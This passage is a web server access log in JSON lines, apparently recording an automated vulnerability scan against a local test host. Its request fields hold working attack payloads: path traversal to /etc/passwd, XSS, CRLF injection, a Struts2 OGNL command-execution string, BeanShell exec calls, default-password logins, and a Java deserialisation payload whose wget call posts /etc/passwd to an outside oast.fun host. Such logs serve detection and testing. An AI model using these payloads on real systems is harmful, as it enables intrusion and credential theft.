"request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"------WebKitFormBoundaryfcKRltGv\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22test.php\x22\x0D\x0AContent-Type: image/avif\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryfcKRltGv--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Upload/upload_file.php?l=test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login?!'>\x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A wget\x0D\x0A --post-file\x0D\x0A /etc/passwd\x0D\x0A c9v8h8gsmpv8c1qg07h0iibp9ddenbynf.oast.fun\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A java.lang.ProcessBuilder\x0D\x0A start\x0D\x0A \x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /orders/3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.192","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"echo\x0D\x0Aecho\x0D\x0Acat /etc/passwd 2>&1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm_program/system/redirect.php?url=javascript://%250aalert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /super/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /HyperGraphQL HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"system.listMethods","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22livechat:registerGuest\x5C\x22,\x5C\x22params\x5C\x22:[{\x5C\x22token\x5C\x22:\x5C\x22cvenucleirocketchat\x5C\x22,\x5C\x22name\x5C\x22:\x5C\x22cve-2020-nuclei\x5C\x22,\x5C\x22email\x5C\x22:\x5C\x22cve@nuclei.local\x5C\x22}],\x5C\x22id\x5C\x22:\x5C\x22123\x5C\x22}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/cve_exploit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /___graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/cask/graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /FileZilla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/?uid=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /darkstat/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/repository HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws2020/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/logoff.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/products HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws2021/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-generated.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wsdl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"bsh.script=exec(\x22id\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-push.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.006","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"bsh.script=exec(\x22ipconfig\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-daily.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"username={{username}}&password={{password}}&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-issues.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/admin-guide/test.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 